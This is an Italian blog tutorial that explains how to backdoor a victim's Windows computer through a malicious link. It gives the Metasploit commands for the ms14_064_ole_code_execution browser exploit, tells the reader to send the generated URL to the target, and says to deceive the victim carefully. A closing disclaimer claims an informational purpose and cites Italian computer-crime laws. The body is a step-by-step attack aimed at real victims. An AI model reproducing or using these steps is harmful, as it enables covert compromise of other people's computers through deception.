
Iniettare una backdoor attraverso un link
Nei precedenti articoli abbiamo discusso su come generare un link maligno per creare una backdoor nel computer vittima, oggi vedremo sempre come iniettare una backdoor attraverso un link, un argomento per lo meno simile al precedente, ma con caratteristiche diverse; il metodo è sempre lo stesso, ovvero quello di riuscire a creare un ponte di comunicazione segreto tra il target e il nostro PC; ai giorni di oggi questo è il principale metodo utilizzato dagli hacker della cosidetta “fascia intermedia”, in quanto, come andremo a vedere nei futuri articoli, queste sono solamente le basi per poi dirigere attacchi più cordinati, difficili e funzionanti. Andiamo subito a vedere come procedere per portare a termine la creazioni di questo link da inviare alla nostra vittima. Innanzitutto per svolgere tutte queste operazioni dovete avere in possesso Kali Linux; successivamente aprite un nuovo terminale e digitate il solito comando “msfconsole”, che richiamerà la console di Metasploit, una delle più utilizzate per questo genere di attacchi e per la sua efficienza.
Bene, una volta che msfconsole si sarà avviata possiamo procedere con una serie di comandi:
– use exploit/windows/browser/ms14_064_ole_code_execution
-set SRVHOST “indirizzo IP locale”
-set SRVPORT “porta locale”
-set uripath /
-exploit
Adesso ci troviamo nel punto cruciale dell’attacco; dopo l’ultimo comando che abbiamo digitato, ovvero exploit, ci sono comparse delle scritte (quelle precedute dall’asterisco blu) ma quella utile a noi è la penultima ovvero “Using URL: https://192.168.1.100:443/”; dovremo copiarla e inviarla al computer sotto attacco, facendo attenzione ad ingannare bene la vittima; in fondo si tratta di cascare in un vero e proprio tranello, in questo caso molto pericoloso.
Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI